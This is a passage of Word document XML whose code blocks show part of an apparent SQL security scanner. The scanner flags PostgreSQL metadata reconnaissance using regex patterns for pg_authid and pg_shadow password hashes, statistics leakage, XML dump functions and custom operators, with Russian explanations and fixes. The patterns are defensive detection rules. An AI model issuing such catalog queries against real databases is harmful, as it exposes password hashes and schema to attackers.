          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A69952" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    METADATA_RECON = "metadata_recon"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C54A66D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26814997"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48F0DCDA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VulnerabilityClass.METADATA_RECON: 7,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B557D79" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BB6278"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24BD9BCB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"meta_recon_high": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190E7A83" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\b(pg_authid|pg_shadow)\b",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7EBD2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C02B3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B704BF8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"meta_recon_mid": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1F32BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\b(pg_proc|pg_get_functiondef|pg_get_function_arguments|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEAB86E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"query_to_xml|table_to_xml|database_to_xml|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B23524" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"query_to_xmlschema|table_to_xmlschema|database_to_xmlschema|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAD968C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"pg_stats|pg_stats_ext|pg_statistic|pg_statistic_ext|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317544FD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"most_common_vals|histogram_bounds)\b",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE4665D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2737F06D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280F5C24" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"meta_recon_low": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704EA30C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\b(pg_class|pg_namespace|pg_attribute|pg_index|pg_constraint|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D1F8A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"pg_roles|pg_settings|pg_extension|pg_available_extensions|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793BCFF0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"information_schema\.(tables|columns|routines)|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A524C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"current_setting|version\(\))\b",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088079B4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C9A397" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2995B059" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"meta_recon_custom_op": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9B0DA9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bCREATE\s+OPERATOR\b",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D680999" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B452081" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FCBA40" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B81E45F"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6122D00D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if _RE["meta_recon_high"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F945DC4"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49DDCFEA"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vulnerability_class=VulnerabilityClass.METADATA_RECON,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7E282F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=10,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD88DA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Запрос обращается к pg_authid / pg_shadow — хешам паролей. "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBF462A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "Доступ требует SUPERUSER; в application-коде нет легитимных use case.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF394D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Удалите чтение pg_authid. Для дампа ролей используйте pg_roles.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A114C8"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72A703FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>elif _RE["meta_recon_mid"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C50D7C1"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1471CEAC"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vulnerability_class=VulnerabilityClass.METADATA_RECON,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1261DE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=8,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75416321" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Запрос читает pg_proc / pg_stats / query_to_xml / "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6884CEF7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "массовые дамп-функции — паттерн разведки структуры или "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A04BBD0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "утечки через optimizer statistics.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A5EB7C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="В application-коде эти каталоги/функции не нужны. "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2247D47B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "Для интроспекции используйте отдельную монитор-роль.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AF43C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C7317C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>elif _RE["meta_recon_low"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C22AE1"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3DF3C27E"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vulnerability_class=VulnerabilityClass.METADATA_RECON,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7943EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062FA102" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Запрос обращается к pg_catalog / information_schema — "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C408F42" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "признак интроспекции схемы. Часто легитимно (ORM, миграции), "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C4C666" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "но в комбинации с конкатенацией строк — индикатор recon.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFBEE6E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Если это runtime-запрос приложения — вынесите интроспекцию "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F6AE5B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "в один раз при старте; в runtime читать каталоги не нужно.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8B9BF8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EB5ACC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05073EEC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
